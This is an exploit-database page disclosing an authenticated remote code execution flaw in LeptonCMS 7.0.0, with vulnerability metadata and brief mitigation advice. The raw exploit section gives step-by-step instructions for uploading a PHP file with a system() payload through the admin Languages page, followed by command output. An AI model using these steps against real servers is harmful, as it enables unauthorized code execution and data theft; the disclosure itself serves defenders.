header-logo
Suggest Exploit
vendor:
LeptonCMS
by:
tmrswrr
6.1
CVSS
HIGH
Remote Code Execution (RCE)
94
CWE
Product Name: LeptonCMS
Affected Version From: 7.0.0
Affected Version To: 7.0.0
Patch Exists: NO
Related CWE:
CPE: a:lepton-cms:lepton:7.0.0
Metasploit:
Other Scripts:
Platforms Tested: Web
2024

LeptonCMS 7.0.0 – Remote Code Execution (RCE) (Authenticated)

By uploading a malicious PHP file in the Languages section of LeptonCMS 7.0.0, an authenticated attacker can execute arbitrary code on the server. This can lead to unauthorized access, data theft, or further compromise of the system. This vulnerability has not been assigned a CVE at the time of writing.

Mitigation:

To mitigate this vulnerability, it is recommended to restrict file upload permissions, sanitize user inputs, and keep the CMS system updated to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: LeptonCMS 7.0.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 2024-1-19
# Exploit Author: tmrswrr
# Category: Webapps
# Vendor Homepage: https://www.lepton-cms.com/
# Version : 7.0.0

1 ) Login with admin cred   >  https://127.0.0.1/LEPTON/backend/login/index.php
2 ) Go to Languages place   > https://127.0.0.1/LEPTON/backend/languages/index.php
3 ) Upload upgrade.php file in languages place > <?php echo system('id'); ?>
4 ) After click install you will be see result

# Result :  uid=1000(lepton) gid=1000(lepton) groups=1000(lepton) uid=1000(lepton) gid=1000(lepton) groups=1000(lepton)

Navigation

Suggest Exploit

Services By CQR